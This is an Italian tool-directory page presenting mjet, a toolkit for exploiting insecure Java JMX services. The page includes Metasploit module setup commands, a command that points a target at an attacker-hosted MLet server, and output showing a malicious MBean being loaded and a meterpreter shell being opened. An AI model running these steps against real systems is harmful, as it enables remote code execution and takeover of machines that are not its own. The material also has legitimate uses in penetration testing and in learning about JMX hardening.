Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mjet — Mogwai Toolkit di Exploitation per Java Management Extensions (JMX) | Kitploit
Strumenti/GitHubGitHub/mogwaisec/mjet
Framework di ExploitGenerazione di PayloadExploitPenetration TestingConfigurazione ErrataRed Teaming
GitHubmogwaisec/mjet

mjet

Mogwai Toolkit di Exploitation per Java Management Extensions (JMX)

Vedi Repository
17431510 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet è uno strumento che può essere utilizzato per proteggere servizi JMX configurati in modo insicuro. Si basa sul post del blog "Exploiting JMX-RMI" di Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" e può essere utilizzato per eseguire payload Metasploit arbitrari sul sistema target.

Mjet era originariamente pensato per essere un toolkit di attacco completo, tuttavia abbiamo notato che il repository Github di Metasploit contiene una pull request che fornirà il supporto di base per Java RMI/serializzazione in ruby nativo. Questo è fantastico e rimuove la dipendenza da Java. Quindi abbiamo smesso di sviluppare questo strumento e creeremo moduli metasploit nel prossimo futuro.

mjet è composto dalle seguenti parti:

  • Un modulo metasploit che emula un "mlet Server". Si tratta fondamentalmente di un web server che ospita un file html contenente un tag mlet
  • Un ManagedBean che viene modificato dal modulo mlet server per includere il payload selezionato
  • Un archivio jar che viene utilizzato per contattare il servizio JMX insicuro.

Installazione (con la versione github di Metasploit)

  • Copiare la cartella "MBean" in "data/java/metasploit"
  • Copiare java_mlet_server.rb in "modules/exploits/multi/misc/"

Utilizzo

L'esempio utilizza i seguenti sistemi: attaccante: 192.168.178.1 target: 192.168.178.200, servizio JMX in esecuzione sulla porta tcp 1616

  • Configurare/avviare il modulo metasploit "java_mlet_server". Il modulo verrà eseguito come job in background
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
Scarica lo strumento

Usare mjet.jar per connettersi al servizio JMX vulnerabile e fornire l'URL al web server MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

e goditi la tua shell meterpreter :-)